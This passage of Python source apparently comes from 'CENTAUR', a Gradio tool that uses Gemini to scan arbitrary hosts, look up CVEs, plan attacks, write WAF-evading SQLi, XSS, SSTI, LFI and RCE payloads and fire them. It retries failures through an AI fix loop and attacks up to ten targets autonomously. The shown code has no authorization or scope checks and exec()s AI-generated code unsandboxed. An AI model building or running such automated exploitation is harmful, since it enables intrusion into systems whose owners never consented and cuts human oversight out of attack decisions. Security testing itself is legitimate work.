if payload in resp.text and ("<script" in payload.lower() or "onerror" in payload.lower()):
result.success = True
result.evidence.append("XSS: Payload reflected")
# SSTI
ssti_results = {"{{7*7}}": "49", "${7*7}": "49", "#{7*7}": "49"}
for probe, expected in ssti_results.items():
if probe in payload and expected in resp.text:
result.success = True
result.evidence.append(f"SSTI: Expression evaluated to {expected}")
# Info leaks (non-fatal evidence)
info_leaks = ["database error", "stack trace", "exception",
"debug mode", "warning:", "notice:", "fatal error",
"traceback", "at line"]
for leak in info_leaks:
if leak in body_lower:
result.evidence.append(f"Info Leak: '{leak}'")
except asyncio.TimeoutError:
result.response_time = EXPLOIT_TIMEOUT
if any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP"]):
result.success = True
result.evidence.append("Time-Based SQLi: Timeout (likely success)")
except Exception as e:
result.evidence.append(f"Error: {str(e)[:100]}")
exploit_logger.log("ERROR", f"Execution error: {str(e)[:100]}")
return result
# ==============================================================================
# PAYLOAD EXECUTION HELPER
# ==============================================================================
def execute_code_template(code: str) -> str:
"""Execute a payload code template and return the printed output."""
import io, contextlib
out = io.StringIO()
local_ns = {}
try:
with contextlib.redirect_stdout(out):
exec(compile(code, "<payload_code>", "exec"), {}, local_ns)
printed = out.getvalue().strip()
if printed:
return printed.split("\n")[0]
if "payload" in local_ns:
return str(local_ns["payload"])
except Exception as e:
return f"# Code error: {e}"
return ""
# ==============================================================================
# AI AGENT FUNCTIONS (UPGRADED TO GEMINI 2.5)
# ==============================================================================
async def ai_analyze_target(profile: ReconProfile, api_key: str) -> Optional[VulnerabilityAnalysis]:
"""Analyze target using Gemini 2.5 with Google Search grounding"""
if not api_key:
return None
llm = genai.Client(api_key=api_key)
# Build context with CMS/technology specific CVE search hints
search_hints = []
if profile.cms_detected:
search_hints.append(f"{profile.cms_detected} known CVEs")
for tech in profile.technologies[:3]:
search_hints.append(f"{tech} vulnerabilities")
context = f"""
Analyze this web application target for vulnerabilities:
TARGET: {profile.target_id}
SERVER: {profile.server_banner}
WAF: {profile.waf_detected}
CMS: {profile.cms_detected}
TECHNOLOGIES: {', '.join(profile.technologies)}
INJECTABLE PARAMS: {profile.injectable_params[:10]}
DISCOVERED PATHS: {profile.discovered_paths[:10]}
API ENDPOINTS: {profile.api_endpoints[:10]}
FORMS FOUND: {profile.forms_found[:5]}
ERROR SIGNATURES: {profile.error_signatures[:5]}
SEARCH FOR: Known CVEs and exploits related to: {', '.join(search_hints[:5])}
Provide a detailed vulnerability assessment focusing on the most exploitable attack vectors.
Include any known CVEs that apply to the detected technologies.
Include secondary vulnerabilities to chain.
"""
try:
# Enable Google Search grounding
grounding_tool = types.Tool(google_search=types.GoogleSearch())
config = types.GenerateContentConfig(
tools=[grounding_tool],
response_mime_type="application/json",
response_json_schema=VulnerabilityAnalysis.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=context,
config=config
)
return VulnerabilityAnalysis.model_validate_json(resp.text)
except Exception as e:
exploit_logger.log("ERROR", f"AI Analysis error: {e}")
return None
async def ai_generate_strategy(profile: ReconProfile, analysis: VulnerabilityAnalysis,
api_key: str) -> Optional[AttackStrategy]:
"""Generate attack strategy with Metasploit template matching"""
llm = genai.Client(api_key=api_key)
# Check if we have a matching Metasploit template
matching_template = None
for template_id, template in METASPLOIT_TEMPLATES.items():
if profile.cms_detected and profile.cms_detected.lower() in template["name"].lower():
matching_template = template_id
break
for cve in analysis.related_cves:
if cve in template.get("cve", ""):
matching_template = template_id
break
context = f"""
Based on this vulnerability analysis, create a detailed attack strategy:
ANALYSIS:
{analysis.model_dump_json(indent=2)}
TARGET CONTEXT:
- Server: {profile.server_banner}
- WAF: {profile.waf_detected}
- CMS: {profile.cms_detected}
- Technologies: {', '.join(profile.technologies)}
- Available endpoints: {profile.api_endpoints[:5]}
- Forms: {profile.forms_found[:5]}
- Injectable params: {profile.injectable_params[:10]}
METASPLOIT TEMPLATES AVAILABLE:
{json.dumps(METASPLOIT_TEMPLATES, indent=2)}
{"RECOMMENDED TEMPLATE: " + matching_template if matching_template else ""}
Specify whether to use GET or POST. For SQLi/LFI/XSS in form fields use POST.
If a Metasploit template applies, specify it in the metasploit_template field.
Generate a comprehensive attack strategy including WAF evasion techniques.
"""
try:
grounding_tool = types.Tool(google_search=types.GoogleSearch())
config = types.GenerateContentConfig(
tools=[grounding_tool],
response_mime_type="application/json",
response_json_schema=AttackStrategy.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=context,
config=config
)
return AttackStrategy.model_validate_json(resp.text)
except Exception as e:
exploit_logger.log("ERROR", f"Strategy generation error: {e}")
return None
async def ai_craft_payload(strategy: AttackStrategy, profile: ReconProfile,
api_key: str) -> Optional[PayloadGeneration]:
"""Craft payload with Metasploit template support"""
llm = genai.Client(api_key=api_key)
vuln_class = strategy.vulnerability_class
library_payloads = []
for vtype, categories in PAYLOAD_LIBRARY.items():
if vtype.lower() in vuln_class.lower() or vuln_class.lower() in vtype.lower():
for cat_payloads in categories.values():
library_payloads.extend(cat_payloads[:3])
# Get Metasploit template if specified
metasploit_context = ""
if strategy.metasploit_template and strategy.metasploit_template in METASPLOIT_TEMPLATES:
template = METASPLOIT_TEMPLATES[strategy.metasploit_template]
metasploit_context = f"""
METASPLOIT TEMPLATE TO USE:
{json.dumps(template, indent=2)}
Use this template as the basis for your payload. Adapt it for the target endpoint.
"""
template_hint = "Custom"
if "SQLi" in vuln_class or "SQL" in vuln_class:
template_hint = "SQLi_TimeBased" if "time" in strategy.strategy.lower() else "SQLi_Union"
elif "LFI" in vuln_class:
template_hint = "LFI_Basic"
elif "RCE" in vuln_class or "Command" in vuln_class:
template_hint = "RCE_CommandInjection"
elif "XSS" in vuln_class:
template_hint = "XSS_Basic"
elif "SSTI" in vuln_class:
template_hint = "SSTI_Detection"
context = f"""
Craft an advanced exploitation payload with Python code:
STRATEGY:
{strategy.model_dump_json(indent=2)}
WAF DETECTED: {profile.waf_detected}
SERVER: {profile.server_banner}
{metasploit_context}
REFERENCE PAYLOADS (use as inspiration, modify for evasion):
{json.dumps(library_payloads[:12], indent=2)}
PYTHON CODE TEMPLATE BASE (extend/modify this):
```python
{PAYLOAD_CODE_TEMPLATES.get(template_hint, PAYLOAD_CODE_TEMPLATES["Custom"])}
```
REQUIREMENTS:
1. Generate the exact payload string ready to fire
2. Provide Python code that generates this payload as a callable function
3. Apply WAF evasion from the strategy
4. Set inject_in_body=True and provide content_type if the attack needs POST body injection
5. Provide 4+ alternative payloads ranked by likelihood of success
6. If using a Metasploit template, adapt it for this specific target
"""
try:
grounding_tool = types.Tool(google_search=types.GoogleSearch())
config = types.GenerateContentConfig(
tools=[grounding_tool],
response_mime_type="application/json",
response_json_schema=PayloadGeneration.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=context,
config=config
)
pg = PayloadGeneration.model_validate_json(resp.text)
exploit_logger.log("INFO", "AI generated payload", {
"payload": pg.payload[:80],
"encoding": pg.encoding,
"method": pg.http_method,
})
return pg
except Exception as e:
exploit_logger.log("ERROR", f"Payload generation error: {e}")
return None
async def ai_analyze_exploit_result(result: ExploitResult, payload: str,
api_key: str) -> Optional[ExploitAnalysis]:
"""Analyze exploit results and provide fix suggestions"""
llm = genai.Client(api_key=api_key)
context = f"""
Analyze this exploitation attempt:
PAYLOAD USED: {payload}
RESULTS:
- Status Code: {result.status_code}
- Response Time: {result.response_time}s
- Evidence Found: {result.evidence}
RESPONSE SNIPPET:
{result.response_body[:800]}
EXTRACTED DATA:
{result.extracted_data[:400]}
Determine if the exploit succeeded, what was confirmed, and recommend next escalation steps.
If the exploit failed, provide specific suggestions to fix/improve the payload.
"""
try:
config = types.GenerateContentConfig(
response_mime_type="application/json",
response_json_schema=ExploitAnalysis.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=context,
config=config
)
return ExploitAnalysis.model_validate_json(resp.text)
except Exception as e:
exploit_logger.log("ERROR", f"Exploit analysis error: {e}")
return None
# ==============================================================================
# AI CODE PATCHING
# ==============================================================================
async def ai_patch_payload_code(current_code: str, user_request: str,
context: dict, api_key: str) -> Optional[PayloadPatchResponse]:
llm = genai.Client(api_key=api_key)
prompt = f"""
You are a penetration testing expert. Patch the following Python payload generation code.
CURRENT CODE:
```python
{current_code}
```
CONTEXT:
- Target: {context.get('target', 'Unknown')}
- Server: {context.get('server', 'Unknown')}
- WAF: {context.get('waf', 'None')}
- Last Result: {context.get('last_result', 'N/A')}
USER REQUEST: {user_request}
INSTRUCTIONS:
1. Modify the code to address the user's request
2. Keep it as executable Python code with functions
3. Add comments explaining changes
4. Ensure the code prints the primary payload as the first line of stdout
Provide patched code and explain what changed.
"""
try:
config = types.GenerateContentConfig(
response_mime_type="application/json",
response_json_schema=PayloadPatchResponse.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=prompt,
config=config
)
patch = PayloadPatchResponse.model_validate_json(resp.text)
exploit_logger.log("INFO", "AI patched code", {"changes": len(patch.changes_made)})
return patch
except Exception as e:
exploit_logger.log("ERROR", f"Code patching failed: {e}")
return None
# ==============================================================================
# FIX LOOP - Iterative Payload Refinement
# ==============================================================================
async def fix_loop_execute(profile: ReconProfile, strategy: AttackStrategy,
initial_payload: PayloadGeneration, api_key: str,
max_iterations: int = MAX_FIX_ITERATIONS):
"""
Execute payload with fix loop: try -> analyze -> fix -> retry
"""
exploit_logger.log("INFO", f"Starting fix loop with max {max_iterations} iterations")
current_payload = initial_payload
iteration_results = []
for iteration in range(max_iterations):
exploit_logger.log("INFO", f"Fix loop iteration {iteration + 1}/{max_iterations}")
# Fire the payload
result = await advanced_payload_fire(
profile.protocol, profile.host, profile.port,
strategy.target_endpoint,
current_payload.payload,
profile.response_time_baseline,
http_method=current_payload.http_method,
inject_in_body=current_payload.inject_in_body,
content_type=current_payload.content_type,
)
# Analyze the result
analysis = await ai_analyze_exploit_result(result, current_payload.payload, api_key)
iteration_results.append({
"iteration": iteration + 1,
"payload": current_payload.payload[:100],
"success": result.success,
"evidence": result.evidence,
"analysis": analysis.model_dump() if analysis else None
})
# If successful, we're done
if result.success:
exploit_logger.log("INFO", f"Fix loop succeeded on iteration {iteration + 1}")
return result, iteration_results
# If we have fix suggestions and haven't hit max iterations, try to fix
if analysis and analysis.fix_suggestions and iteration < max_iterations - 1:
exploit_logger.log("INFO", f"Attempting to fix payload based on suggestions")
# Generate improved payload based on suggestions
fix_context = f"""
Previous payload failed. Apply these fixes:
{', '.join(analysis.fix_suggestions)}
Original strategy:
{strategy.model_dump_json(indent=2)}
Last result:
- Status: {result.status_code}
- Evidence: {result.evidence}
- Response: {result.response_body[:200]}
Generate an improved payload that addresses the failure.
"""
try:
llm = genai.Client(api_key=api_key)
config = types.GenerateContentConfig(
response_mime_type="application/json",
response_json_schema=PayloadGeneration.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=fix_context,
config=config
)
current_payload = PayloadGeneration.model_validate_json(resp.text)
exploit_logger.log("INFO", f"Generated new payload: {current_payload.payload[:80]}")
except Exception as e:
exploit_logger.log("ERROR", f"Failed to generate fix: {e}")
break
else:
# No more suggestions or max iterations reached
break
exploit_logger.log("INFO", f"Fix loop completed after {len(iteration_results)} iterations")
return result, iteration_results
# ==============================================================================
# WAR ROOM AGENT
# ==============================================================================
async def centaur_chat_agent(user_msg, chat_history, target_id, state,
current_ep, current_pl, current_code, http_method, api_key):
"""Centaur chat agent with Gradio 6 compatibility"""
chat_history = chat_history or []
if not api_key or not target_id:
chat_history.append({"role": "user", "content": user_msg})
chat_history.append({"role": "assistant", "content": "🔴 Missing API Key or Target Selection."})
return chat_history, current_ep, current_pl, current_code, http_method, state
llm = genai.Client(api_key=api_key)
p = state["profiles"][target_id]
recent_arsenal = state["arsenal"][target_id][-5:] if target_id in state["arsenal"] else []
context = f"""
You are CENTAUR, an elite Red Team AI assistant specialising in web application security.
TARGET INTELLIGENCE:
- ID: {target_id}
- Server: {p.server_banner}
- WAF: {p.waf_detected}
- CMS: {p.cms_detected}
- Technologies: {', '.join(p.technologies)}
- Discovered Paths: {p.discovered_paths[:10]}
- API Endpoints: {p.api_endpoints[:10]}
- Forms: {p.forms_found[:5]}
- Injectable Params: {p.injectable_params[:10]}
- Error Signatures: {p.error_signatures[:5]}
- Response Baseline: {p.response_time_baseline:.2f}s
CURRENT STATE:
HTTP Method: {http_method}
Endpoint: {current_ep}
Payload: {current_pl}
CURRENT CODE:
```python
{current_code}
```
RECENT ATTEMPTS:
{json.dumps(recent_arsenal, indent=2)}
OPERATOR REQUEST: {user_msg}
INSTRUCTIONS:
1. Analyse the request using all available intelligence
2. Update endpoint, payload, code, and HTTP method as needed
3. Provide expert technical guidance with specific references to recon data
4. Explain evasion techniques clearly
5. Return http_method as GET or POST based on the best attack approach
"""
try:
config = types.GenerateContentConfig(
response_mime_type="application/json",
response_json_schema=CentaurChatResponse.model_json_schema()
)
resp = await llm.aio.models.generate_content(
model="gemini-2.5-flash",
contents=context,
config=config
)
data = CentaurChatResponse.model_validate_json(resp.text)
formatted_reply = f"**{data.chat_reply}**\n\n📋 Technical Analysis:\n{data.technical_analysis}"
chat_history.append({"role": "user", "content": user_msg})
chat_history.append({"role": "assistant", "content": formatted_reply})
state["arsenal"][target_id].append({
"Timestamp": datetime.now().strftime("%H:%M:%S"),
"Method": data.http_method,
"Endpoint": data.suggested_endpoint,
"Payload": data.suggested_payload,
"Status": "🤖 AI Generated",
"Notes": f"From: {user_msg[:50]}...",
})
return (chat_history, data.suggested_endpoint, data.suggested_payload,
data.suggested_code, data.http_method, state)
except Exception as e:
exploit_logger.log("ERROR", f"Chat agent failed: {e}")
chat_history.append({"role": "user", "content": user_msg})
chat_history.append({"role": "assistant", "content": f"⚠️ Agent Error: {str(e)}"})
return chat_history, current_ep, current_pl, current_code, http_method, state
# ==============================================================================
# AUTONOMOUS FLEET
# ==============================================================================
async def run_autonomous_fleet(selected, api_key, state):
"""Run autonomous fleet with fix loop integration"""
if not api_key or not selected:
return "🔴 Deployment Error: Select targets and provide API Key.", "", []
detailed_logs = []
async def attack_sequence(tid):
p = state["profiles"][tid]
log = [f"🎯 Target: {tid}",
f"📡 Recon: {len(p.discovered_paths)} paths, {len(p.api_endpoints)} APIs"]
try:
log.append("🧠 Phase 1: AI Vulnerability Analysis (with Google Search)...")
analysis = await ai_analyze_target(p, api_key)
if not analysis:
return {"Target": tid, "Phase": "Analysis", "Status": "❌ Failed", "Details": "AI analysis failed"}
log.append(f" └─ {analysis.vulnerability_type} ({analysis.confidence})")
log.append(f" └─ {analysis.reasoning[:100]}...")
if analysis.related_cves:
log.append(f" └─ CVEs: {', '.join(analysis.related_cves[:3])}")
log.append("🎮 Phase 2: Attack Strategy Generation...")
strategy = await ai_generate_strategy(p, analysis, api_key)
if not strategy:
return {"Target": tid, "Phase": "Strategy", "Status": "❌ Failed", "Details": "Strategy failed"}
log.append(f" └─ Attack: {strategy.vulnerability_class} via {strategy.http_method}")
log.append(f" └─ Endpoint: {strategy.target_endpoint}")
log.append(f" └─ Evasion: {', '.join(strategy.evasion_techniques[:3])}")
if strategy.metasploit_template:
log.append(f" └─ Metasploit: {strategy.metasploit_template}")
log.append("⚔️ Phase 3: Payload Generation...")
payload_gen = await ai_craft_payload(strategy, p, api_key)
if not payload_gen:
return {"Target": tid, "Phase": "Payload", "Status": "❌ Failed", "Details": "Payload gen failed"}
log.append(f" └─ Payload: {payload_gen.payload[:80]}...")
log.append(f" └─ Encoding: {payload_gen.encoding}")
log.append("🔄 Phase 4: Fix Loop Execution (up to 3 attempts)...")
final_result, iterations = await fix_loop_execute(p, strategy, payload_gen, api_key)
for iter_data in iterations:
log.append(f" └─ Attempt {iter_data['iteration']}: {iter_data['success'] and '✅ Success' or '❌ Failed'}")
log.append(f" Evidence: {', '.join(iter_data['evidence'][:2])}")
if final_result.success:
log.append("🎊 Phase 5: Breach Confirmed!")
log.append(f" └─ Confirmed: {analysis.vulnerability_type}")
log.append(f" └─ Evidence: {', '.join(final_result.evidence[:3])}")
state["arsenal"][tid].append({
"Timestamp": datetime.now().strftime("%H:%M:%S"),
"Method": payload_gen.http_method,
"Endpoint": strategy.target_endpoint,
"Payload": payload_gen.payload,
"Code": payload_gen.code_template,
"Status": "✅ BREACH CONFIRMED",
"Notes": f"{analysis.vulnerability_type} | {', '.join(final_result.evidence[:2])} | {len(iterations)} attempts",
})
detailed_logs.append("\n".join(log))
return {
"Target": tid,
"Vulnerability":analysis.vulnerability_type,
"Confidence": analysis.confidence,
"Method": payload_gen.http_method,
"Payload": payload_gen.payload[:60] + "...",
"Status": "✅ BREACH" if final_result.success else "🔒 Blocked",
"Evidence": ", ".join(final_result.evidence[:2]) if final_result.evidence else "None",
"HTTP": final_result.status_code,
"Attempts": len(iterations),
}
except Exception as e:
exploit_logger.log("ERROR", f"Autonomous failed on {tid}: {e}")
detailed_logs.append("\n".join(log) + f"\n❌ Error: {str(e)}")
return {"Target": tid, "Vulnerability": "Error", "Confidence": "N/A",
"Method": "N/A", "Payload": "N/A", "Status": "❌ Failed",
"Evidence": str(e)[:50], "HTTP": 0, "Attempts": 0}
results = await asyncio.gather(*[attack_sequence(t) for t in selected[:10]])
df = pd.DataFrame(results)
success_count = len(df[df['Status'] == '✅ BREACH'])
total = len(df)
summary = f"""## 🚀 Autonomous Fleet Report
**Breaches:** {success_count}/{total} | **Success Rate:** {(success_count/total*100):.1f}%
**Attack Distribution:** {df['Vulnerability'].value_counts().to_dict()}
**Fix Loop Stats:** Avg attempts: {df['Attempts'].mean():.1f}"""
html_table = df.to_html(classes='table', index=False, escape=False)
return summary, html_table, detailed_logs
# ==============================================================================
# UI HELPER FUNCTIONS
# ==============================================================================
def get_payload_library_df():
rows = []
for vuln_type, categories in PAYLOAD_LIBRARY.items():
for category, payloads in categories.items():
for payload in payloads:
rows.append({"Type": vuln_type, "Category": category, "Payload": payload})
return pd.DataFrame(rows)
def filter_payloads(vuln_type_filter, search_term):
df = get_payload_library_df()
if vuln_type_filter and vuln_type_filter != "All":
df = df[df["Type"] == vuln_type_filter]
if search_term:
df = df[df["Payload"].str.contains(search_term, case=False, na=False)]
return df
def get_db_dataframe(state, ip_filter="", port_filter="", vuln_only=False):
profs = list(state.get("profiles", {}).values())
if not profs:
return pd.DataFrame(columns=["target_id","protocol","server","waf","cms",
"paths","errors","forms","apis","tech","Status"])
df = pd.DataFrame([p.to_dict() for p in profs])
df["Status"] = df.apply(
lambda row: "✅ Exploitable" if (row["paths"] > 0 or row["errors"] > 0) else "⚪ Limited", axis=1
)
if ip_filter:
df = df[df["target_id"].str.contains(ip_filter, case=False, na=False)]
if port_filter:
df = df[df["target_id"].str.endswith(f":{port_filter}")]
if vuln_only:
df = df[df["Status"] == "✅ Exploitable"]
return df
async def run_recon_bg(files, manual, state):
targets = []
if files:
for f in files:
try:
with open(f.name, 'r') as csvf:
for row in csv.reader(csvf):
if row:
host = row[0].strip()
port = int(row[1]) if len(row) > 1 and row[1].strip().isdigit() else 80
targets.append((host, port))
except Exception:
pass
if manual:
for line in manual.strip().split('\n'):
line = line.strip().replace(' ', '')
if not line or line.startswith('#'):
continue
if ':' in line:
parts = line.split(':')
host = parts[0]
port = int(parts[1]) if parts[1].isdigit() else 80
else:
host = line
port = 80
targets.append((host, port))
if not targets:
yield state, gr.update(choices=[]), gr.update(choices=[]), "❌ No targets provided", pd.DataFrame()
return
exploit_logger.clear()
exploit_logger.log("INFO", f"Starting reconnaissance on {len(targets)} targets")
state["profiles"] = {}
state["arsenal"] = defaultdict(list)
sem = asyncio.Semaphore(MAX_CONCURRENT_RECON)
async def scan_task(h, p):
async with sem:
return await AdvancedReconEngine(ReconProfile(h, p)).run()
tasks = [asyncio.create_task(scan_task(h, p)) for h, p in list(set(targets))]
total = len(tasks)
for i, coro in enumerate(asyncio.as_completed(tasks), 1):
p = await coro
state["profiles"][p.target_id] = p
exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable]
df = get_db_dataframe(state)
progress = f"🔍 Scanning: {i}/{total} | Exploitable: {len(exploitable)}"
yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), progress, df
final_exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable]
final_df = get_db_dataframe(state)
final_msg = f"✅ Recon Complete! Scanned {total}. Found {len(final_exploitable)} exploitable."
exploit_logger.log("INFO", final_msg)
yield state, gr.update(choices=final_exploitable), gr.update(choices=final_exploitable), final_msg, final_df
def on_target_select(tid, state):
if not tid or tid not in state["profiles"]:
return ("Select a target from the dropdown...",
pd.DataFrame(columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]),
PAYLOAD_CODE_TEMPLATES["Custom"])
p = state["profiles"][tid]
context = f"""## 🎯 Target Profile: `{tid}`
**Infrastructure:**
- Protocol: `{p.protocol.upper()}` | Server: `{p.server_banner}` | WAF: `{p.waf_detected}` | CMS: `{p.cms_detected}`
- Technologies: `{', '.join(p.technologies) if p.technologies else 'Unknown'}`
**Attack Surface:**
- Paths: `{len(p.discovered_paths)}` → {', '.join(p.discovered_paths[:5])}
- APIs: `{len(p.api_endpoints)}` → {', '.join(p.api_endpoints[:5])}
- Forms: `{len(p.forms_found)}` | Errors: `{len(p.error_signatures)}`
- Injectable Params: `{', '.join(p.injectable_params[:8])}`
**Timing Baseline:** `{p.response_time_baseline:.3f}s`
**Error Intelligence:**
{chr(10).join(['- ' + sig for sig in p.error_signatures[:5]]) or '- None'}
"""
arsenal_data = state["arsenal"].get(tid, [])
df = pd.DataFrame(arsenal_data) if arsenal_data else pd.DataFrame(
columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"])
return context, df, PAYLOAD_CODE_TEMPLATES["Custom"]
async def execute_manual_wrap(tid, ep, pl, code, http_method, use_code, state):
if not tid or tid not in state["profiles"]:
return "❌ Select a valid target first.", state, pd.DataFrame(), exploit_logger.format_logs()
p = state["profiles"][tid]
actual_payload = pl
if use_code and code.strip():
derived = execute_code_template(code)
if derived and not derived.startswith("# Code error"):
actual_payload = derived
exploit_logger.log("INFO", f"Using code-derived payload: {actual_payload[:80]}")
exploit_logger.log("INFO", "Manual execution", {
"target": tid, "method": http_method,
"endpoint": ep, "payload_len": len(actual_payload)
})
result = await advanced_payload_fire(
p.protocol, p.host, p.port, ep, actual_payload,
p.response_time_baseline, http_method=http_method
)
status_icon = "✅ SUCCESS" if result.success else "🔒 Blocked"
evidence_str = " | ".join(result.evidence[:3]) if result.evidence else "No evidence"
result_md = f"""### Execution Result
**Status:** {status_icon} | **HTTP:** {result.status_code} | **Time:** {result.response_time:.2f}s
**Evidence:** {evidence_str}
**Response Snippet:**
```
{result.response_body[:500]}
```
**Extracted Data:**
```
{result.extracted_data[:400] if result.extracted_data else 'None'}
```"""
state["arsenal"][tid].append({
"Timestamp": datetime.now().strftime("%H:%M:%S"),
"Method": http_method,
"Endpoint": ep,
"Payload": actual_payload,
"Code": code,
"Status": status_icon,
"Notes": evidence_str,
})
return result_md, state, pd.DataFrame(state["arsenal"][tid]), exploit_logger.format_logs()
def load_payload_template(template_name):
return PAYLOAD_CODE_TEMPLATES.get(template_name, PAYLOAD_CODE_TEMPLATES["Custom"])
async def patch_code_with_ai(current_code, user_request, tid, state, api_key):
if not tid or tid not in state["profiles"]:
return current_code, "❌ Select a target first"
p = state["profiles"][tid]
context = {
"target": tid,
"server": p.server_banner,
"waf": p.waf_detected,
"last_result": state["arsenal"].get(tid, [{}])[-1].get("Status", "N/A")
if state["arsenal"].get(tid) else "N/A",
}
patch = await ai_patch_payload_code(current_code, user_request, context, api_key)
if patch:
changes = "\n".join(f"- {c}" for c in patch.changes_made)
return patch.updated_code, f"**Changes:**\n{changes}\n\n**Explanation:**\n{patch.explanation}"
return current_code, "❌ Failed to patch code"
# ==============================================================================
# GRADIO UI (GRADIO 6 COMPATIBLE)
# ==============================================================================
_CSS = """
.primary-btn { background: linear-gradient(45deg,#ff0080,#ff8c00) !important; }
.exploit-table { font-family: 'Courier New', monospace; font-size: 0.9em; }
.code-editor { font-family: 'Courier New', monospace; font-size: 0.95em; }
"""
with gr.Blocks(css=_CSS, theme=gr.themes.Monochrome()) as demo:
engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)})
gr.Markdown("# ⚔️ CENTAUR — Autonomous Penetration Testing Platform")
gr.Markdown("### AI-Powered Web Application Security Assessment Framework (Gemini 2.5 + Fix Loop)")
with gr.Row():
api_key = gr.Textbox(
label="🔑 Gemini API Key", type="password",
placeholder="AIzaSy...", scale=3
)
gr.Markdown(
"Get your key from [Google AI Studio](https://aistudio.google.com/app/apikey)"
)
with gr.Tabs():
# ===== TAB 1: RECONNAISSANCE =====
with gr.Tab("🔍 1. Reconnaissance"):
with gr.Row():
with gr.Column(scale=1):
gr.Markdown("### Target Input")
csv_in = gr.File(label="📁 CSV Upload (host,port)", file_count="multiple")
txt_in = gr.Textbox(
label="✍️ Manual Entry (one per line)",
placeholder="192.168.1.1:80\nexample.com:443\n10.0.0.1",
lines=5
)
recon_btn = gr.Button("🚀 START RECONNAISSANCE", variant="primary", size="lg")
recon_status = gr.Markdown("⚪ System Ready")
with gr.Column(scale=2):
gr.Markdown("### 🗄️ Target Database")
with gr.Row():
f_ip = gr.Textbox(label="🔎 IP/Host Filter", placeholder="192.168", scale=2)
f_port = gr.Textbox(label="Port Filter", placeholder="80", scale=1)
f_v = gr.Checkbox(label="Exploitable Only", scale=1)
db_viewer = gr.Dataframe(interactive=False, wrap=True, elem_classes="exploit-table")
# ===== TAB 2: WAR ROOM =====
with gr.Tab("⚔️ 2. War Room"):
with gr.Row():
with gr.Column(scale=1):
gr.Markdown("### 🎯 Target Selection")
wr_target = gr.Dropdown(label="Active Target", choices=[], interactive=True)
wr_context = gr.Markdown("*Select a target to view intelligence...*")
gr.Markdown("### 📚 Arsenal History")
arsenal_table = gr.Dataframe(
headers=["Timestamp","Method","Endpoint","Payload","Status","Notes"],
interactive=False, wrap=True, elem_classes="exploit-table"
)
with gr.Column(scale=1):
gr.Markdown("### 🛠️ Payload Editor")
with gr.Accordion("📖 Payload Library", open=False):
with gr.Row():
lib_type = gr.Dropdown(label="Type", choices=["All"] + list(PAYLOAD_LIBRARY.keys()), value="All")
lib_search = gr.Textbox(label="Search", placeholder="SLEEP")
lib_table = gr.Dataframe(value=get_payload_library_df(), interactive=False, wrap=True)
with gr.Accordion("💻 Code Templates", open=False):
template_select = gr.Dropdown(label="Load Template",
choices=list(PAYLOAD_CODE_TEMPLATES.keys()),
value="Custom")
load_template_btn = gr.Button("Load Template")
http_method_sel = gr.Radio(
label="HTTP Method", choices=["GET","POST","PUT","DELETE"],
value="GET"
)
ep_in = gr.Textbox(label="🎯 Endpoint", placeholder="/api/users?id=", value="")
pl_in = gr.Textbox(label="💉 Payload", placeholder="' OR SLEEP(5)--", value="", lines=3)
gr.Markdown("### 📝 Payload Code (Editable & Executable)")
code_editor = gr.Code(
label="Python Code", language="python",
value=PAYLOAD_CODE_TEMPLATES["Custom"],
lines=15, elem_classes="code-editor"
)
use_code_chk = gr.Checkbox(
label="🔄 Execute code template to derive payload before firing",
value=False
)
with gr.Row():
fire_btn = gr.Button("🔥 EXECUTE PAYLOAD", variant="primary", size="lg")
clear_btn = gr.Button("🧹 Clear", size="lg")
fire_res = gr.Markdown()
with gr.Accordion("📊 Execution Logs", open=False):
log_viewer = gr.Textbox(label="Detailed Logs", lines=10, max_lines=20, interactive=False)
with gr.Column(scale=1):
gr.Markdown("### 🤖 AI Agent — CENTAUR")
chatbot = gr.Chatbot(
height=400, label="Conversational Interface",
show_label=False,
avatar_images=(None, "https://em-content.zobj.net/source/twitter/376/robot_1f916.png")
)
chat_in = gr.Textbox(
label="Operator Instruction",
placeholder="The WAF blocked my SQLi. Help me bypass it with double URL encoding.",
lines=2
)
with gr.Row():
chat_btn = gr.Button("📡 Send to Agent", variant="primary")
patch_code_btn = gr.Button("🔧 Patch Code with AI")
patch_result = gr.Markdown()
# ===== TAB 3: AUTONOMOUS FLEET =====
with gr.Tab("🤖 3. Autonomous Fleet"):
gr.Markdown("""### 🚀 Multi-Target Autonomous Exploitation
Deploy AI agents to: analyse vulnerabilities (with CVE search) → generate strategies (with Metasploit templates) → craft payloads → execute with fix loop (auto-retry up to 3x) → analyse results.""")
fleet_select = gr.CheckboxGroup(label="🎯 Select Targets (max 10)", choices=[])
fleet_deploy = gr.Button("⚡ DEPLOY AUTONOMOUS FLEET", variant="primary", size="lg")
fleet_md = gr.Markdown()
fleet_html = gr.HTML()
with gr.Accordion("📜 Detailed Attack Logs", open=False):
fleet_logs = gr.JSON(label="Execution Logs")
# ===== EVENT HANDLERS =====
recon_btn.click(
run_recon_bg,
inputs=[csv_in, txt_in, engine_state],
outputs=[engine_state, wr_target, fleet_select, recon_status, db_viewer]
)
for comp in [f_ip, f_port, f_v]:
comp.change(get_db_dataframe,
inputs=[engine_state, f_ip, f_port, f_v],
outputs=db_viewer)
wr_target.change(
on_target_select,
inputs=[wr_target, engine_state],
outputs=[wr_context, arsenal_table, code_editor]
)
lib_type.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table)
lib_search.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table)
load_template_btn.click(load_payload_template, inputs=[template_select], outputs=code_editor)
arsenal_table.select(
lambda tid, st, evt: (
st["arsenal"][tid][evt.index[0]].get("Endpoint", ""),
st["arsenal"][tid][evt.index[0]].get("Payload", ""),
st["arsenal"][tid][evt.index[0]].get("Code", "# No code available"),
st["arsenal"][tid][evt.index[0]].get("Method", "GET"),
